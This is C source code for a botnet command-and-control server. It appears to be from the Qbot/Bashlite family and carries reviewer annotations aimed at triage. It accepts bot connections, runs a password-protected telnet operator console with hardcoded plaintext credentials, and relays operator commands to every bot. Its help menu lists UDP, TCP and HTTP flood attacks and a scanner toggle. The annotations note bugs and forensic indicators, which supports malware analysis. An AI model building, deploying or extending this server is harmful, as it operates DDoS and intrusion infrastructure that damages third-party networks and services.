  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netdb.h>
  7. #include <unistd.h>
  8. #include <time.h>
  9. #include <fcntl.h>
  10. #include <sys/epoll.h>
  11. #include <errno.h>
  12. #include <pthread.h>
  13. #include <signal.h>
  14.  
/*
 * Management-console accounts, stored as plaintext string literals.
 * telnetWorker() compares the submitted username and password against these
 * with strcmp(); no hashing or lockout appears anywhere in this listing.
 * Because the literals and the port are compiled in, they can serve as static
 * indicators when triaging a binary built from this source.
 */
#define MY_MGM_ADMINP "heropvmer659"
#define MY_MGM_ADMINU "ctlbz"
#define MY_MGM_MATENP "Crimsons"
#define MY_MGM_MATENU "Crimson"
#define MY_MGM_USERP "aadd"
#define MY_MGM_USERU "aaad"
#define MY_MGM_GUESTP "ddaaaa"
#define MY_MGM_GUESTU "daaaad"
#define MY_MGM_PORT 420 /* TCP port telnetListener() binds for the operator console */

#define MAXFDS 1000000 /* number of slots in clients[] and managements[]; both are indexed by descriptor number */
/* Set to 1 by telnetWorker() on a successful login for the matching account; never read or cleared in this listing. */
char MY_USER_ADMIN=0, MY_USER_USER=0, MY_USER_MATEN=0, MY_USER_GUEST=0;
/* Per-descriptor state for a connection accepted on the bot listener. */
struct clientdata_t {
    uint32_t ip;     /* peer address as stored by epollEventLoop() at accept time */
    char build[7];   /* not referenced elsewhere in this listing */
    char connected;  /* non-zero while the slot is considered live */
} clients[MAXFDS];
/* Per-descriptor state for a management (operator) session. */
struct telnetdata_t {
    int connected;   /* set by telnetWorker() after login, cleared when the session ends */
} managements[MAXFDS];
static volatile FILE *fileFD; /* not referenced elsewhere in this listing */
static volatile int epollFD = 0;  /* epoll instance created in main() */
static volatile int listenFD = 0; /* bot listener socket created in main() */
/* NOTE(review): modified with ++/-- from one thread per management session; volatile does not make that atomic. */
static volatile int managesConnected = 0;
/*
 * Read from fd one byte at a time into buffer until a '\n' has been stored,
 * bufferSize bytes have been counted, or read() returns something other than 1.
 * Returns the value of the last read() call (1, 0 at end of file, -1 on error),
 * or the initial 1 if the loop body never ran.
 *
 * NOTE(review): on the first pass total is 0, so the loop condition reads
 * *(buffer - 1), one byte before the caller's buffer (out-of-bounds read).
 * NOTE(review): no terminator is written here. Callers pass sizeof buf, so a
 * line that fills the whole buffer leaves it unterminated for the strlen()/
 * strstr() calls they make afterwards.
 */
int fdgets(unsigned char *buffer, int bufferSize, int fd)
{
    int total = 0, got = 1;
    /* total is advanced even when read() fails; only got is returned to the caller */
    while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
    return got;
}
/* Strip leading and trailing whitespace from str in place and NUL-terminate the result. */
void trim(char *str)
{
    int first = 0;
    int last = strlen(str) - 1;
    int kept;

    /* Skip over leading whitespace. */
    while (isspace(str[first]))
        first++;

    /* Back up over trailing whitespace without crossing the first kept character. */
    while ((last >= first) && isspace(str[last]))
        last--;

    /* Shift the surviving characters to the front; the regions may overlap. */
    kept = (last >= first) ? (last - first + 1) : 0;
    memmove(str, str + first, kept);
    str[kept] = '\0';
}
  55.  
  56.  
/*
 * Switch descriptor sfd to non-blocking mode by OR-ing O_NONBLOCK into its
 * file status flags. Returns 0 on success, or -1 after reporting the failing
 * fcntl() call through perror().
 */
static int make_socket_non_blocking (int sfd)
{
    int current = fcntl (sfd, F_GETFL, 0);

    if (current == -1)
    {
        perror ("fcntl");
        return -1;
    }

    /* F_SETFL ignores access-mode and creation flags, so handing the full set back is harmless. */
    if (fcntl (sfd, F_SETFL, current | O_NONBLOCK) == -1)
    {
        perror ("fcntl");
        return -1;
    }

    return 0;
}
  80.  
  81.  
/*
 * Create a TCP socket bound to the given service/port string on the wildcard
 * address and return its descriptor, or -1 on failure. The socket is not put
 * into the listening state here; main() does that.
 */
static int create_and_bind (char *port)
{
    struct addrinfo hints;
    struct addrinfo *result, *rp;
    int s, sfd;
    memset (&hints, 0, sizeof (struct addrinfo));
    hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
    hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
    hints.ai_flags = AI_PASSIVE; /* All interfaces */
    s = getaddrinfo (NULL, port, &hints, &result);
    if (s != 0)
    {
        fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
        return -1;
    }
    /* Try each candidate address until one binds. */
    for (rp = result; rp != NULL; rp = rp->ai_next)
    {
        sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
        if (sfd == -1) continue;
        int yes = 1;
        /* A SO_REUSEADDR failure is only reported; the bind is still attempted. */
        if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
        s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
        if (s == 0)
        {
            break;
        }
        close (sfd);
    }
    if (rp == NULL)
    {
        /* NOTE(review): result is not released with freeaddrinfo() on this path. */
        fprintf (stderr, "Could not bind\n");
        return -1;
    }
    freeaddrinfo (result);
    return sfd;
}
  118.  
/*
 * Relay msg to every slot marked as a connected bot and, unless msg is exactly
 * "PING", to every logged-in management session as well.
 *
 * msg      - text to relay; sent as given (not the trimmed copy made below).
 * us       - descriptor to skip (the sender); main() passes -1.
 * username - name shown in front of the message on management sessions.
 *
 * The table index i is used directly as the socket descriptor. Traffic is
 * plaintext: bots receive msg followed by a single '\n'.
 */
void broadcast(char *msg, int us, char *username)
{
    int sendMGM = 1;
    if(strcmp(msg, "PING") == 0) sendMGM = 0; // keep-alive pings are not echoed to management sessions
    // NOTE(review): wot is a trimmed copy of msg that is never sent or read before free(); malloc() is unchecked.
    char *wot = malloc(strlen(msg) + 10);
    memset(wot, 0, strlen(msg) + 10);
    strcpy(wot, msg);
    trim(wot);
    // NOTE(review): the timestamp is built and trimmed but not used below.
    time_t rawtime;
    struct tm * timeinfo;
    time(&rawtime);
    timeinfo = localtime(&rawtime);
    char *timestamp = asctime(timeinfo);
    trim(timestamp);
    int i;
    for(i = 0; i < MAXFDS; i++)
    {
        // Skip the sender, and skip slots that are neither a connected bot nor (when allowed) a management session.
        if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
        if(sendMGM && managements[i].connected)
        {
            // Management sessions get a coloured "username:" prefix.
            // The hard-coded lengths here also count each literal's terminating NUL.
            send(i, "\x1b[94m", 6, MSG_NOSIGNAL);
            send(i, username, strlen(username), MSG_NOSIGNAL);
            send(i, ":\x1b[91m ", 8, MSG_NOSIGNAL);
        }
        printf("sent to fd: %d\n", i); // operator-side debug trace on the server's stdout, one line per recipient
        send(i, msg, strlen(msg), MSG_NOSIGNAL);
        if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[94m> \x1b[91m", 15, MSG_NOSIGNAL); // redraw the prompt on management sessions
        else send(i, "\n", 1, MSG_NOSIGNAL); // bots receive newline-terminated commands
    }
    free(wot);
}
  155.  
/*
 * Worker thread for the bot-facing listener. Waits on the shared epoll
 * instance, accepts new connections on listenFD, and answers PING/PONG lines
 * from connected clients. main() starts several of these threads; they all
 * share epollFD and the clients[] table, and no locking appears in this
 * listing. The function loops forever and never returns; the argument is unused.
 *
 * Management sessions are not registered with epoll; telnetWorker() serves
 * them on their own threads.
 */
void *epollEventLoop(void *useless)
{
    struct epoll_event event;
    struct epoll_event *events;
    int s;
    // NOTE(review): one MAXFDS-sized event array per thread, and the calloc() result is not checked.
    events = calloc (MAXFDS, sizeof event);
    while (1)
    {
        int n, i;
        n = epoll_wait (epollFD, events, MAXFDS, -1);
        for (i = 0; i < n; i++)
        {
            // Error, hang-up, or an event without readable data: drop the connection.
            if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
            {
                clients[events[i].data.fd].connected = 0;
                close(events[i].data.fd);
                continue;
            }
            else if (listenFD == events[i].data.fd)
            {
                // Edge-triggered listener: accept until the queue is drained.
                while (1)
                {
                    struct sockaddr in_addr;
                    socklen_t in_len;
                    int infd, ipIndex;

                    in_len = sizeof in_addr;
                    infd = accept (listenFD, &in_addr, &in_len); // accept a connection on the bot port
                    if (infd == -1)
                    {
                        if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
                        else
                        {
                            perror ("accept");
                            break;
                        }
                    }

                    // NOTE(review): infd is used as a table index without a check against MAXFDS, and the peer
                    // address is read as sockaddr_in although create_and_bind() asks for AF_UNSPEC.
                    clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;

                    int dup = 0;
                    for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // linear scan for another connected slot with the same stored address
                    {
                        if(!clients[ipIndex].connected || ipIndex == infd) continue;

                        if(clients[ipIndex].ip == clients[infd].ip)
                        {
                            dup = 1;
                            break;
                        }
                    }

                    if(dup)
                    {
                        printf("dup client\n"); // reported on the server's stdout
                        // Both strings go only to the newly accepted descriptor, which is then closed.
                        // How a client reacts to them is not shown in this listing.
                        if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; }
                        if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; }
                        close(infd);
                        continue;
                    }

                    s = make_socket_non_blocking (infd);
                    if (s == -1) { close(infd); break; }

                    // Register the new connection for edge-triggered read events.
                    event.data.fd = infd;
                    event.events = EPOLLIN | EPOLLET;
                    s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
                    if (s == -1)
                    {
                        perror ("epoll_ctl");
                        close(infd);
                        break;
                    }

                    clients[infd].connected = 1;
                    // First line every accepted client receives; a fixed plaintext string on the wire.
                    send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
                }
                continue;
            }
            else
            {
                // Readable data from an already-registered client.
                int thefd = events[i].data.fd;
                struct clientdata_t *client = &(clients[thefd]);
                int done = 0;
                client->connected = 1;
                while (1)
                {
                    ssize_t count;
                    char buf[2048];
                    memset(buf, 0, sizeof buf);

                    // memset() returns buf (non-NULL), so it only serves to zero the buffer before each line read.
                    while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
                    {
                        if(strstr(buf, "\n") == NULL) { done = 1; break; } // a read that ended without a newline ends the session
                        trim(buf);
                        if(strcmp(buf, "PING") == 0) // keep-alive: answer PING with PONG
                        {
                            if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; }
                            continue;
                        }
                        if(strcmp(buf, "PONG") == 0) // and PONG with PING
                        {
                            if(send(thefd, "PING\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; }
                            continue;
                        }

                        // Any other line from a client is only printed on the server's stdout.
                        printf("buf: \"%s\"\n", buf);
                    }

                    if (count == -1)
                    {
                        // EAGAIN means the socket is drained for now; any other error ends the session.
                        if (errno != EAGAIN)
                        {
                            done = 1;
                        }
                        break;
                    }
                    else if (count == 0)
                    {
                        // Peer closed the connection.
                        done = 1;
                        break;
                    }
                }

                if (done)
                {
                    client->connected = 0;
                    close(thefd);
                }
            }
        }
    }
}
  289.  
/* Count the entries of clients[] whose connected flag is set, scanning all MAXFDS slots. */
unsigned int clientsConnected()
{
    int live = 0;
    int slot;

    for (slot = 0; slot < MAXFDS; slot++)
    {
        if (clients[slot].connected)
            live++;
    }

    return live;
}
  301.  
/*
 * Thread body that rewrites the terminal title of one management session every
 * two seconds with the current bot and user counts. sock carries the session's
 * descriptor cast to a pointer. The loop ends only when send() fails.
 */
void *titleWriter(void *sock)
{
    // The formatted text is two integers plus a short fixed string, far below the 2048-byte buffer.
    int thefd = (int)sock;
    char string[2048];
    while(1)
    {
        memset(string, 0, 2048);
        sprintf(string, "%c]0;Bots connected: %d | Users connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
        // ESC ]0; ... BEL is the terminal "set window title" sequence; the \007 terminates it rather than ringing a bell.
        // NOTE(review): bare "return;" in a function declared to return void *.
        if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;

        sleep(2);
    }
}
  318.  
  319.  
/*
 * Thread body for one management (operator) session; sock carries the accepted
 * descriptor cast to a pointer. Prompts for a username and password, compares
 * them against the compiled-in MY_MGM_* literals, then reads command lines and
 * relays them to the bots through broadcast().
 *
 * Points relevant to a reviewer or responder:
 *  - Credentials and commands cross the socket in plaintext.
 *  - status and the MY_USER_* flags are set per account but never read in this
 *    listing, so all four accounts reach the same command loop.
 *  - Every relayed command is appended to /tmp/.log as "username: command",
 *    which makes that file a forensic artifact on the server host.
 *  - NOTE(review): the length arguments to send() are hard-coded. For some
 *    literals as they appear here the count exceeds the literal (e.g. 24 for
 *    the 19-character "Acces denied" line), which would transmit bytes beyond
 *    it. The paste may have collapsed padding spaces, so confirm against a build.
 *  - NOTE(review): control reaches the end of a function declared to return
 *    void * without a return statement.
 */
void *telnetWorker(void *sock)
{
    int thefd = (int)sock;
    managesConnected++;
    pthread_t title;
    char buf[2048];
    char* nickstring;
    memset(buf, 0, sizeof buf);
    char username[80];
    char status=0;

    if(send(thefd, "\x1b[39mUsername:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
    if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
    trim(buf);
    // Comma expression: the "%s" operand is discarded, so nickstring simply aliases buf.
    nickstring = ("%s", buf);
    // Each branch below: username matched, so prompt for the password and compare it in plaintext.
    if(strcmp(nickstring, MY_MGM_ADMINU) == 0){
        if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
        trim(buf);
        if(strcmp(buf, MY_MGM_ADMINP) != 0) goto failed;
        memset(buf, 0, 2048);
        sprintf(username, MY_MGM_ADMINU);
        MY_USER_ADMIN=1;
        status=1;
        goto fak;
    }
    else if(strcmp(nickstring, MY_MGM_USERU) == 0){
        if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
        trim(buf);
        if(strcmp(buf, MY_MGM_USERP) != 0) goto failed;
        memset(buf, 0, 2048);
        sprintf(username, MY_MGM_USERU);
        MY_USER_USER=1;
        status=2;
        goto fak;
    }
    else if(strcmp(nickstring, MY_MGM_MATENU) == 0){
        if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
        trim(buf);
        if(strcmp(buf, MY_MGM_MATENP) != 0) goto failed;
        memset(buf, 0, 2048);
        sprintf(username, MY_MGM_MATENU);
        MY_USER_MATEN=1;
        status=3;
        goto fak;
    }
    else if(strcmp(nickstring, MY_MGM_GUESTU) == 0){
        if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
        trim(buf);
        if(strcmp(buf, MY_MGM_GUESTP) != 0) goto failed;
        memset(buf, 0, 2048);
        sprintf(username, MY_MGM_GUESTU);
        MY_USER_GUEST=1;
        status=4;
        goto fak;
    }
    // Always true once the four equality tests above have failed; acts as the "unknown username" branch.
    else if(strcmp(nickstring, MY_MGM_GUESTU) != 0 || strcmp(nickstring, MY_MGM_ADMINU) != 0 || strcmp(nickstring, MY_MGM_USERU) != 0 || strcmp(nickstring, MY_MGM_MATENU) != 0 ){
        if(send(thefd, "\x1b[39mAcces denied\r\n", 24, MSG_NOSIGNAL) == -1) goto end;
        goto end;
    }
    failed: // wrong password: one attempt per connection, then the socket is closed
    if(send(thefd, "\x1b[39mAcces denied\r\n", 24, MSG_NOSIGNAL) == -1) goto end;
    goto end;
    fak: // logged in (also re-entered by the CLEAR command below)

    if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
    // NOTE(review): every pass through this label starts another titleWriter thread for the same descriptor.
    pthread_create(&title, NULL, &titleWriter, sock); /* starts the title-bar updater for this session */
    if(send(thefd, "\033[H\033[J\x1b[94m*****************************************\r\n", 56, MSG_NOSIGNAL) == -1) goto end;
    if(send(thefd, "* \x1b[92mCTS NET\x1b[94m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
    if(send(thefd, "* \x1b[92mYES\x1b[94m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
    if(send(thefd, "*****************************************\r\n\r\n\x1b[94m> \x1b[92m", 58, MSG_NOSIGNAL) == -1) goto end;
    /* Any failed banner write ends the session. */
    managements[thefd].connected = 1; // from here on broadcast() also echoes relayed commands to this session
    while(fdgets(buf, sizeof buf, thefd) > 0)
    {
        trim(buf);
        // These two command strings are not relayed: the attempt is logged and the session is dropped.
        if(strstr(buf, "!* LOLNOGTFO"))
        {
            printf("ATTEMPT TO KILL ALL BOTS BY %s\n", username);
            FILE *logFile;
            logFile = fopen("/tmp/.log", "a"); // NOTE(review): fopen() result is not checked before use
            fprintf(logFile, "ATTEMPT TO KILL ALL BOTS BY %s\n", username);
            fclose(logFile);
            goto end;
        }
        if(strstr(buf, "!* SH"))
        {
            printf("ATTEMPT TO SH BY %s\n", username);
            FILE *logFile;
            logFile = fopen("/tmp/.log", "a"); // NOTE(review): fopen() result is not checked before use
            fprintf(logFile, "ATTEMPT TO SH BY %s\n", username);
            fclose(logFile);
            goto end;
        }

        // HELP prints the command syntax to the operator; clearing buf afterwards makes the
        // empty-line check below skip the broadcast.
        if(strncmp(buf, "HELP", 5) == 0){
            if(send(thefd, "!* UDP IP PORT TIME NMASK PSIZE PI\r\n", 36, MSG_NOSIGNAL) == -1) goto end;
            if(send(thefd, "!* TCP IP PORT TIME NMASK FLAGS PSIZE PI\r\n", 42, MSG_NOSIGNAL) == -1) goto end;
            if(send(thefd, "!* HTTP SITE SECONDS\r\n", 22, MSG_NOSIGNAL) == -1) goto end;
            if(send(thefd, "!* KILLATTK\r\n", 13, MSG_NOSIGNAL) == -1) goto end;
            if(send(thefd, "!* SCANNER ON | OFF\r\n", 21, MSG_NOSIGNAL) == -1) goto end;
            if(send(thefd, "CLEAR\r\n", 7, MSG_NOSIGNAL) == -1) goto end;
            memset(buf, 0, 2048);
        }
        if(strncmp(buf, "CLEAR", 5) == 0){
            goto fak; // redraw the banner; the memset below is unreachable
            memset(buf, 0, 2048);
        }

        FILE *logFile;
        if(send(thefd, "\x1b[94m> \x1b[91m", 13, MSG_NOSIGNAL) == -1) goto end;
        if(strlen(buf) == 0) continue;
        // Audit trail on the server: who relayed which line.
        logFile = fopen("/tmp/.log", "a"); // NOTE(review): fopen() result is not checked before use
        fprintf(logFile, "%s: %s\n", username, buf);
        fclose(logFile);
        // Anything else the operator types is relayed to the connected clients.
        broadcast(buf, thefd, username);
        memset(buf, 0, 2048);

    }

    end: // common exit: mark the slot free, close the socket, update the session counter
    managements[thefd].connected = 0;
    close(thefd);
    managesConnected--;
}
  448.  
/*
 * Thread body that listens for management (operator) connections on
 * MY_MGM_PORT, on all IPv4 interfaces, and starts one telnetWorker thread per
 * accepted connection. The argument is unused and the function never returns.
 *
 * NOTE(review): failures of socket(), bind() and accept() are only reported
 * with perror() and execution continues; after a failed accept() a worker is
 * still started with a negative descriptor, which telnetWorker() uses as an
 * index into managements[].
 */
void *telnetListener(void *useless)
{
    int sockfd, newsockfd;
    socklen_t clilen;
    struct sockaddr_in serv_addr, cli_addr;
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) perror("ERROR opening socket");
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = INADDR_ANY; // console is reachable on every interface, not just loopback
    serv_addr.sin_port = htons(MY_MGM_PORT);
    if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
    listen(sockfd,5); // return value not checked
    clilen = sizeof(cli_addr);
    while(1)
    {
        newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
        if (newsockfd < 0) perror("ERROR on accept");
        pthread_t thread;
        // The descriptor is passed to the worker by value inside the pointer argument; the thread is neither joined nor detached here.
        pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
    }
}
  471.  
/*
 * Entry point. Usage: <program> [port] [threads].
 * Binds the bot-facing listener on argv[1], registers it with a new epoll
 * instance, starts argv[2] epollEventLoop threads plus one telnetListener
 * thread for the management console, then sends "PING" to all connected
 * clients every 60 seconds for the life of the process.
 */
int main (int argc, char *argv[])
{
    signal(SIGPIPE, SIG_IGN); // writes to a closed peer must not terminate the process

    int s, threads;
    struct epoll_event event;

    if (argc != 3)
    {
        fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
        exit (EXIT_FAILURE);
    }
    // NOTE(review): atoi() gives no error indication, and the value later sizes a variable-length array;
    // a negative count would make that array size invalid.
    threads = atoi(argv[2]);

    listenFD = create_and_bind (argv[1]); // bot-facing listener; abort on failure
    if (listenFD == -1) abort ();

    s = make_socket_non_blocking (listenFD); // required for the edge-triggered accept loop
    if (s == -1) abort ();


    s = listen (listenFD, SOMAXCONN); // system maximum backlog
    if (s == -1)
    {
        perror ("listen");
        abort ();
    }

    epollFD = epoll_create1 (0); // epoll instance shared by all worker threads
    if (epollFD == -1)
    {
        perror ("epoll_create");
        abort ();
    }

    event.data.fd = listenFD;
    event.events = EPOLLIN | EPOLLET;
    s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
    if (s == -1)
    {
        perror ("epoll_ctl");
        abort ();
    }

    // Slot 0 is reserved for the management listener; the epoll workers fill slots from the top down.
    pthread_t thread[threads + 2];
    while(threads--)
    {
        pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // each worker waits on the same epoll instance
    }

    pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);

    // Periodic keep-alive: broadcast() does not echo "PING" to management sessions.
    while(1)
    {
        broadcast("PING", -1, "b0ats");

        sleep(60);
    }

    // Unreachable: the loop above never exits.
    close (listenFD);

    return EXIT_SUCCESS;
}